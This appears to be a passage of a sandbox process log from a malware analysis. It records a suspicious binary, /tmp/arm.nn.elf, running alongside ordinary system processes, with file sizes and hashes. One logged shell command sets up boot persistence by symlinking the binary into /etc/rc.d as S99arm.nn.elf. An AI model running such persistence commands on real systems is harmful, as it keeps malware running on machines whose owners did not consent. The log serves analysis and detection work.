                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/ln
                                                                        Arguments:ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
                                                                        File size:76160 bytes
                                                                        MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/lib/udisks2/udisksd
                                                                        Arguments:-
                                                                        File size:483056 bytes
                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/sbin/dumpe2fs
                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                        File size:31112 bytes
                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/lib/systemd/systemd
                                                                        Arguments:-
                                                                        File size:1620224 bytes
                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                        File size:22760 bytes
                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/lib/udisks2/udisksd
                                                                        Arguments:-
                                                                        File size:483056 bytes
                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/sbin/dumpe2fs
                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                        File size:31112 bytes
                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/lib/udisks2/udisksd
                                                                        Arguments:-
                                                                        File size:483056 bytes
                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/sbin/dumpe2fs
                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                        File size:31112 bytes
                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4